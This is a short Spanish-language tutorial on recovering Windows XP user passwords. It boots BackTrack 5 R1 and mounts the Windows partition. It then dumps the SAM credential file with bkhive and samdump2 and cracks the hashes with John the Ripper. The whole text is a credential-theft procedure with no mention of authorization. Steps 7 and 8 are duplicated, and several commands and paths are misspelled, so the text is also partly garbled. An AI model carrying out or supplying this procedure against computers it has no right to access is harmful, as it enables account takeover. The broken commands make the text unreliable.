Objetivo
Obtener los passwords de los diferentes usuarios de windows XP
Paso 1
Lo primero que debemos hacer es encender
el computador, Bootear desde el dispositivo que contenga el BackTrack
5 R1.
Paso 2
En BackTrack 5 R1 tenemos seis opciones de arranque que son:
- BackTrack Text
- BackTrack Stealth
- BackTrack Forensics
- BackTrack Debus
- BackTrack Mentest
- Hard Drive Boot
Seleccionamos BackTrack Text y nos va mostrar :
root@root:~#
Paso 3
Luego realizamos el siguiente comando para ver las particiones que tenemos
fdisk -l
Una vez sabiendo en que partición esta windows creamos una carpeta
mkdir /media/winOS
Paso 4
Montamos la partición de Windows colocando el nombre de nuestro dispositivo
(para el ejemplo usaremos sda1).
sudo mount /dev/sda1 /media/winOS
Paso5
Ejecutamos
bkhive sobre el archivo system, este comando no ayudará a extraer la
información necesaria guardando el resultado en el archivo pass
Esto lo logramos con el siguiente comando:
bkhive /media/winOS/WINDOWS/system32/config/system pass
Paso 6
Ejecutamos samdump2 sobre los archivos SAM y pass. pass que es la copia de system nos ayudará a descifrar el archivo SAM, y el resultado lo guardamos en el archivo pass1:
samdump2 /media/winOS/WINDOWS/system32/config/SAM pass > pass1
Paso 7
Debemos copiar al archivo pass1 a la carpeta de John:
cp pass1 /pentest/password/john
y luego nos dirigimos a esta ruta
root@root: cd /pentes/paswwords/john
y luego nos dirigimos a esta ruta
root@root: cd /pentes/paswwords/john
Paso 8
Ejecutamos
root@root: ./johm pass1
recuerden que john the ripper es una aplicación de fuerza bruta tomara el tiempo dependiendo de la clave
Ejecutamos
root@root: ./johm pass1
recuerden que john the ripper es una aplicación de fuerza bruta tomara el tiempo dependiendo de la clave